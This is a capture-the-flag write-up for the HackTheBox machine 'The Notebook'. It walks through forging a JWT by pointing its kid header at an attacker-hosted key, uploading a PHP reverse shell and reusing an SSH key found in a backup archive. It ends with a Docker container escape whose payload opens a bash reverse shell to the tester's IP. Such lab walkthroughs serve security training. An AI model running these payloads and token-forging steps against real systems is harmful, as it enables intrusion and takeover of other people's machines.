The Notebook | HackTheBox Writeup

Overview

The Notebook is a medium Linux-based machine in HackTheBox by mostwanted002

User Part

Start with nmap scan found 3 open ports

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 00:37 EDT
Nmap scan report for 10.10.10.230
Host is up (0.18s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
5555/tcp open freeciv?
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 181.34 ms 10.10.14.1
2 181.72 ms 10.10.10.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.02 seconds

Look into HTTP, this is the website I got with a login and registration page.

I registered with username admin1 and login to dashboard

I got a JWT in cookies i decoded it with jwt.io

I found kid JWT Token.

This article gave me an idea about JWT kid exploitation.

FOr Exploitation, I created ssh key using ssh-keygen with the key name.

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# ssh-keygen -t rsa -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in privKey.key.pub
The key fingerprint is:
SHA256:1M/0JYqN2juJNBd8zEymR1rcKw4hjf0jLfaDLVeihAg root@kali
The key's randomart image is:
+---[RSA 3072]----+
| + . . |
| E o.+ * . |
| . ..+.#. ...|
| ... @B%ooo |
| Soo&==. |
| oo= * |
| ..+.+ . |
| . o. |
| .. |
+----[SHA256]-----+

I decoded the header part and encoded it with my local IP as kid value.

I changed the header with my newly created base64 code and the full JWT looks like this.

As you can see I only changed value of kid to my local machine.

I got a request from the IP.

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# python3 -m http.server 7070 1
Serving HTTP on 0.0.0.0 port 7070 (http://0.0.0.0:7070/) ...
10.10.10.230 - - [21/Jun/2021 01:06:36] "GET /privKey.key HTTP/1.1" 200 -

This time i changed body part with admin_cap to 1 from 0.

But I didn’t get any changes to the website. 

so I checked for python jwt and this website gave me an idea to create a python script.

i created a python script with the help of that website and look like this.

import jwt

PrivateKey = open("privKey.key","r").read().strip()
Headers = {"kid":"http://10.10.14.32:7070/privKey.key"}
Payload = {"username":"admin","email":"admin@thmhtb","admin_cap":1}

Token = jwt.encode(Payload,PrivateKey,algorithm='RS256',headers=Headers)

print("\n\n")

print(Token)

print("\n\n")

by running the script i got this JWT

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# python3 jwt_generation_script.py
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4zMjo3MDcwL3ByaXZLZXkua2V5In0.eyJ1c2VybmFtZSI6ImFkbWluMSIsImVtYWlsIjoiYWRtaW5Abm90ZWJvb2suaHRiIiwiYWRtaW5fY2FwIjoxfQ.m9m923fpJC5y0os44_TFV4Fgp3Cqu7RI7uU9HmtuPJTzUrGfMhsWl1ui7Hrb9KdcAdxRLDQdet303_sb1AOgm6MVGaGV6GqKksA4VL5XgELyDew6ePWohukvSGzfTDPW1CF5ntRtfNbVOXI_0L4cMYkrBaItsbtZXYyYa1_h3g9cKfjB0xRV3YxsxBM86Q6l8Kp15Y7vVTf-ZYrT0KNn-pVWEbjH-rYKyrVpFoKYOWolTc4a9R0WB44cZlUyNG69zCTHM8Q7MIUEcUpO2urmkC8wjRB0whbDeyCOeSBqaUY2gvvAnBNmrHZQfuRSFqfHSSmTLTRFXQm30tqBVb4ln15BdD3WSGKnL8gvhrI5R1I2BLQDuJZ0OEM3YfXmqmhddrno0K6JEL7CdxNmvC8bp8MqoQ50YX5FMdtYcwzwBu7UcUx5LtmHU5OJ7_yZPqA8D0H1xXfVP7XFCINzvDC0PA4Rmf0Zb9zXSllM-etEH0qNo-W7LUgUdGEtW24VgX6N

I verified that using jwt.io

I got a new dashboard by adding the jwt in cookie and refreshing the page.

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# python3 -m http.server 7070
Serving HTTP on 0.0.0.0 port 7070 (http://0.0.0.0:7070/) ...
10.10.10.230 - - [21/Jun/2021 02:27:54] "GET /privKey.key HTTP/1.1" 200 -

Clicking on the admin panel shows i can upload files.

I uploaded php-reverse-shell and got shell back

i got some backup files from /var/backups.

a home.tar.gz which is suspicious.

so i downloaded it to my local machine and checked that.

www-data@thenotebook:/var/backups$ ls -la
ls -la
total 696
drwxr-xr-x 2 root root 4096 Jun 21 06:26 .
drwxr-xr-x 14 root root 4096 Feb 12 06:52 ..
-rw-r--r-- 1 root root 51200 Jun 21 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 33252 Feb 24 08:53 apt.extended_states.0
-rw-r--r-- 1 root root 3609 Feb 23 08:58 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3621 Feb 12 06:52 apt.extended_states.2.gz
-rw-r--r-- 1 root root 437 Feb 12 06:17 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Feb 12 06:52 dpkg.statoverride.0
-rw-r--r-- 1 root root 571460 Feb 24 08:53 dpkg.status.0
-rw------- 1 root root 693 Feb 17 13:18 group.bak
-rw------- 1 root shadow 575 Feb 17 13:18 gshadow.bak
-rw-r--r-- 1 root root 4373 Feb 17 09:02 home.tar.gz
-rw------- 1 root root 1555 Feb 12 06:24 passwd.bak
-rw------- 1 root shadow 1024 Feb 12 07:33 shadow.bak
www-data@thenotebook:/var/backups$
┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# wget 10.10.10.230:2000/home.tar.gz
--2021-06-21 02:41:03-- http://10.10.10.230:2000/home.tar.gz
Connecting to 10.10.10.230:2000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4373 (4.3K) [application/gzip]
Saving to: ‘home.tar.gz’

home.tar.gz 100%[============================================>] 4.27K --.-KB/s in 0s

2021-06-21 02:41:03 (80.7 MB/s) - ‘home.tar.gz’ saved [4373/4373]


┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─#

I extracted that and I got id_rsa from that.

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# tar -xvf home.tar.gz
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub

I got user shell by that id_rsa

 
┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# chmod 600 home/noah/.ssh/id_rsa

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# ssh -i home/noah/.ssh/id_rsa noah@10.10.10.230
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon Jun 21 06:43:59 UTC 2021

System load: 0.11 Processes: 205
Usage of /: 40.2% of 7.81GB Users logged in: 1
Memory usage: 19% IP address for ens160: 10.10.10.230
Swap usage: 0% IP address for docker0: 172.17.0.1


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

61 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Jun 21 06:22:03 2021 from 10.10.14.61
noah@thenotebook:~$

Root Part

I check what commands current user can run with root privilege using sudo -l.

i got docker.

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
noah@thenotebook:~$

i checked docker version and it’s old.

noah@thenotebook:~$ docker version
Client:
Version: 18.06.0-ce
API version: 1.38
Go version: go1.10.3
Git commit: 0ffa825
Built: Wed Jul 18 19:09:54 2018
OS/Arch: linux/amd64
Experimental: false
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.38/version: dial unix /var/run/docker.sock: connect: permission denied
noah@thenotebook:~$

I checked for the exploit and got CVE.

then i searched for POC in github.

I changed the code to get reverse shell in my machine by changing below mentioned code and uploaded to docker.

<--->

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.32/4200 0>&1"

<--->
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 bash
root@90ce2b0668d0:/opt/webapp# cd /tmp/
root@90ce2b0668d0:/tmp# wget 10.10.14.32:8012/main
--2021-06-21 07:33:46-- http://10.10.14.32:8012/main
Connecting to 10.10.14.32:8012... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2236814 (2.1M) [application/octet-stream]
Saving to: ‘main.1’

main.1 100%[============================================>] 2.13M 1023KB/s in 2.1s

2021-06-21 07:33:48 (1023 KB/s) - ‘main.1’ saved [2236814/2236814]

root@90ce2b0668d0:/tmp#

I executed and got root.shell back

 
root@90ce2b0668d0:/tmp# ./main 
[+] Overwritten /bin/sh successfully
[+] Found the PID: 57
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc0000aa180}
root@90ce2b0668d0:/tmp#
 
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
No help topic for '/bin/sh'
noah@thenotebook:~$

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# nc -lvnp 4200
Listening on 0.0.0.0 4200
Connection received on 10.10.10.230 41878
bash: cannot set terminal process group (5722): Inappropriate ioctl for device
bash: no job control in this shell
<47f46e91675653d57a915006bf61ab13a6790e75f2c511ee9# cat /root/root.txt
cat /root/root.txt
1adcc38b3f8508915e9c59f0656a0f8d
<47f46e91675653d57a915006bf61ab13a6790e75f2c511ee9#
Share on facebook
Share on twitter
Share on linkedin